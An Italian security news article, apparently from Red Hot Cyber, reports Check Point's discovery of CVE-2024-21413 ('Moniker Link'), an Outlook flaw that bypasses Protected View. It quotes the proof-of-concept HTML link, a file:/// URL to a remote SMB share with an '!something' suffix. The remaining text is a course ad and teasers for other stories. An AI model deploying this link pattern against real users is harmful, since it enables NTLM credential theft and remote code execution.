
Microsoft segnala che aggressori remoti non autenticati potrebbero sfruttare la vulnerabilità critica in Outlook. Tale bug potrebbe aggirare Office Protected View e ottenere l’esecuzione remota di codice arbitrario.
Questa vulnerabilità è stata scoperta dai ricercatori di Check Point e ha ricevuto l’identificatore CVE-2024-21413. Interessa numerosi prodotti Office, tra cui Microsoft Office LTSC 2021 e Microsoft 365 Apps for Enterprise, nonché Microsoft Outlook 2016 e Microsoft Office 2019.
Il bug porta all’esecuzione di codice in modalità remota quando si aprono e-mail con collegamenti dannosi utilizzando una versione vulnerabile di Microsoft Outlook. Il problema è che il bug consente di aggirare la Visualizzazione protetta. Si tratta di un meccanismo progettato per bloccare i contenuti dannosi incorporati nei file di Office e aprire i file di Office dannosi in modalità di modifica.
Christmas Sale -40% 𝗖𝗵𝗿𝗶𝘀𝘁𝗺𝗮𝘀 𝗦𝗮𝗹𝗲! Sconto del 𝟰𝟬% 𝘀𝘂𝗹 𝗽𝗿𝗲𝘇𝘇𝗼 𝗱𝗶 𝗰𝗼𝗽𝗲𝗿𝘁𝗶𝗻𝗮 del Corso "Dark Web & Cyber Threat Intelligence" in modalità E-Learning sulla nostra Academy!🚀
Fino al 𝟯𝟭 𝗱𝗶 𝗗𝗶𝗰𝗲𝗺𝗯𝗿𝗲, prezzi pazzi alla Red Hot Cyber Academy. 𝗧𝘂𝘁𝘁𝗶 𝗶 𝗰𝗼𝗿𝘀𝗶 𝘀𝗰𝗼𝗻𝘁𝗮𝘁𝗶 𝗱𝗲𝗹 𝟰𝟬% 𝘀𝘂𝗹 𝗽𝗿𝗲𝘇𝘇𝗼 𝗱𝗶 𝗰𝗼𝗽𝗲𝗿𝘁𝗶𝗻𝗮.
Per beneficiare della promo sconto Christmas Sale, scrivici ad [email protected] o contattaci su Whatsapp al numero di telefono: 379 163 8765.
Se ti piacciono le novità e gli articoli riportati su di Red Hot Cyber, iscriviti immediatamente alla newsletter settimanale per non perdere nessun articolo. La newsletter generalmente viene inviata ai nostri lettori ad inizio settimana, indicativamente di lunedì. |
Gli sviluppatori hanno avvertito che le anteprime possono diventare anche un vettore di attacco. Questo poiché il CVE-2024-21413 può essere sfruttato anche attraverso l’anteprima di documenti dannosi.
“Un utente malintenzionato che sfrutta con successo questa vulnerabilità potrebbe ottenere privilegi elevati, comprese funzioni di lettura, scrittura ed eliminazione”, spiega Microsoft . “Un utente malintenzionato potrebbe creare un collegamento dannoso per aggirare la Visualizzazione protetta, portando alla perdita delle credenziali NTLM locali e all’esecuzione di codice remoto (RCE).”
Gli analisti di Check Point chiamano la vulnerabilità Moniker Link e affermano che consente di aggirare la protezione di Outlook contro i collegamenti dannosi incorporati nelle e-mail tramite file://. Devi solo aggiungere un punto esclamativo all’URL, che punta ai server controllati dagli aggressori.
Un punto esclamativo viene aggiunto immediatamente dopo l’espansione del documento, insieme al testo libero (Check Point ha utilizzato la parola “qualcosa” nell’esempio):*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*
Questo collegamento ignora le restrizioni di Outlook e Outlook accede alla risorsa remota \\\10.10.111.111\test\test.rtf quando si fa clic sul collegamento, senza visualizzare avvisi o errori.
Secondo i ricercatori, la vulnerabilità è legata all’API MkParseDisplayName, quindi potrebbe influenzare altri software che la utilizzano.
“Anche altre edizioni e versioni di Office sono probabilmente interessate da questo problema. In effetti, riteniamo che questo bug non sia stato rilevato ed esista nell’ecosistema Windows/COM da decenni perché è basato sull’API COM. Consigliamo vivamente a tutti gli utenti di Outlook di installare la patch ufficiale il prima possibile”, scrive Check Point.
Seguici su Google News, LinkedIn, Facebook e Instagram per ricevere aggiornamenti quotidiani sulla sicurezza informatica. Scrivici se desideri segnalarci notizie, approfondimenti o contributi da pubblicare.


Secondo quanto appreso da fonti interne di RedHotCyber, l’offensiva digitale che sta creando problemi al Sistema Postale Nazionale in Francia è stata ufficialmente rivendicata dal collettivo hacker filo-russo NoName057(16). Gli analisti confermano che l’azione rientra…

L’analisi che segue esamina il vettore di attacco relativo alla CVE-2025-47761, una vulnerabilità individuata nel driver kernel Fortips_74.sys utilizzato da FortiClient VPN per Windows. Il cuore della problematica risiede in una IOCTL mal gestita che…

Una vulnerabilità critica è stata individuata in MongoDB, tra le piattaforme di database NoSQL più utilizzate a livello globale. Questa falla di sicurezza, monitorata con il codice CVE-2025-14847, permette agli aggressori di estrarre dati sensibili…

Il procuratore generale del Texas Ken Paxton ha accusato cinque importanti produttori di televisori di aver raccolto illegalmente dati degli utenti utilizzando la tecnologia di riconoscimento automatico dei contenuti (ACR) per registrare ciò che i…

L’Autorità Garante della Concorrenza e del Mercato italiana (AGCM) ha imposto una sanzione significativa ad Apple. La sanzione ammonta a 98,6 milioni di euro, ovvero circa 115 milioni di dollari. ed è relativa a al…